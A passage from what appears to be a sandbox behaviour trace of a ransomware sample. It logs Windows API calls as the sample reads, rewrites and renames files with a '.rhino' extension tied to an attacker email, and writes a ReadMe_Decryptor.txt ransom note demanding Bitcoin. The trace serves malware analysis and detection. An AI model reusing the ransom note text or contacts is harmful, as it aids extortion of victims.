Flags=0x0, Size=0x8d) returned 0x72a920 [0090.295] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b00f0 [0090.295] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0380 [0090.295] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b04c8 [0090.295] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b06b0 [0090.295] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b04c8 | out: hHeap=0x6d0000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b0980 [0090.296] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b06b0 | out: hHeap=0x6d0000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x721318 [0090.296] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0980 | out: hHeap=0x6d0000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b0380 [0090.296] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721318 | out: hHeap=0x6d0000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x721318 [0090.296] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x722130 [0090.296] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721318 | out: hHeap=0x6d0000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x723670 [0090.297] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722130 | out: hHeap=0x6d0000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x725638 [0090.297] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x723670 | out: hHeap=0x6d0000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x75ef78 [0090.297] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x725638 | out: hHeap=0x6d0000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x7636c8 [0090.297] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x73c0b8 [0090.299] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7636c8 | out: hHeap=0x6d0000) returned 1 [0090.299] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x72bfe8 [0090.301] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0090.301] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x781f78 [0090.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0090.304] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x24b0048 [0090.309] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0090.309] WriteFile (in: hFile=0x104, lpBuffer=0x24b0060*, nNumberOfBytesToWrite=0x16db6, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x24b0060*, lpNumberOfBytesWritten=0x2cfa04*=0x16db6, lpOverlapped=0x0) returned 1 [0090.309] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0090.309] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16db6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.309] CloseHandle (hObject=0x104) returned 1 [0090.514] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x23b0380 [0090.514] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x23b0498 [0090.514] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0090.514] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.516] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0498 | out: hHeap=0x6d0000) returned 1 [0090.516] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01f8 | out: hHeap=0x6d0000) returned 1 [0090.516] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0090.516] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b00f0 [0090.516] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.516] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b01b8 [0090.516] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x23b0280 [0090.516] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01b8 | out: hHeap=0x6d0000) returned 1 [0090.516] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.517] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0090.517] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0090.519] CloseHandle (hObject=0x104) returned 1 [0090.520] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0280 | out: hHeap=0x6d0000) returned 1 [0090.520] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.521] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x1e00 [0090.521] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1f20, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.521] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.521] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.523] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.524] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x1e00, lpOverlapped=0x0) returned 1 [0090.525] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.525] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.525] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.525] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.525] GetLastError () returned 0x0 [0090.525] SetLastError (dwErrCode=0x0) [0090.525] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.525] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e23) returned 0x75ef78 [0090.525] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.525] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b01b8 [0090.525] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02c0 [0090.525] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01b8 | out: hHeap=0x6d0000) returned 1 [0090.525] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.525] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.525] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0090.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0090.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0090.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b01b8 [0090.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0448 [0090.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01b8 | out: hHeap=0x6d0000) returned 1 [0090.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0590 [0090.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0448 | out: hHeap=0x6d0000) returned 1 [0090.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0778 [0090.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0590 | out: hHeap=0x6d0000) returned 1 [0090.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b0a48 [0090.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0778 | out: hHeap=0x6d0000) returned 1 [0090.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x760da8 [0090.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0a48 | out: hHeap=0x6d0000) returned 1 [0090.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b0448 [0090.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760da8 | out: hHeap=0x6d0000) returned 1 [0090.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x760da8 [0090.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0448 | out: hHeap=0x6d0000) returned 1 [0090.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x761bc0 [0090.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760da8 | out: hHeap=0x6d0000) returned 1 [0090.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x763100 [0090.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761bc0 | out: hHeap=0x6d0000) returned 1 [0090.527] WriteFile (in: hFile=0x104, lpBuffer=0x763120*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x763120*, lpNumberOfBytesWritten=0x2cfa04*=0x1f20, lpOverlapped=0x0) returned 1 [0090.528] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763100 | out: hHeap=0x6d0000) returned 1 [0090.528] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1f20, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.528] CloseHandle (hObject=0x104) returned 1 [0090.529] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x23b0448 [0090.529] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x23b0560 [0090.529] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0448 | out: hHeap=0x6d0000) returned 1 [0090.529] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.531] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0560 | out: hHeap=0x6d0000) returned 1 [0090.531] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02c0 | out: hHeap=0x6d0000) returned 1 [0090.531] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b01b8 [0090.531] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0048 [0090.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x23b0280 [0090.531] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.531] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0280 | out: hHeap=0x6d0000) returned 1 [0090.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.533] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xe00 [0090.533] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf20, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.534] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.534] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.537] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.538] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xe00, lpOverlapped=0x0) returned 1 [0090.538] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.538] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.538] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.538] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.538] GetLastError () returned 0x0 [0090.538] SetLastError (dwErrCode=0x0) [0090.538] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.538] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe00) returned 0x75ef78 [0090.538] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.538] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0048 [0090.539] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0280 [0090.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.539] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.539] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.539] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.539] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.539] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.539] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.539] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0090.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.539] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0090.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.539] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.540] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.540] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.540] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.540] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.540] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.540] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.540] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.540] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.540] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0090.540] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.540] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0048 [0090.540] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.540] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0408 [0090.540] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.540] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0550 [0090.540] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0408 | out: hHeap=0x6d0000) returned 1 [0090.540] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0738 [0090.540] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0550 | out: hHeap=0x6d0000) returned 1 [0090.540] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b0a08 [0090.541] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0738 | out: hHeap=0x6d0000) returned 1 [0090.541] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75fd80 [0090.541] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0a08 | out: hHeap=0x6d0000) returned 1 [0090.541] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b0408 [0090.541] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fd80 | out: hHeap=0x6d0000) returned 1 [0090.541] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75fd80 [0090.541] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0408 | out: 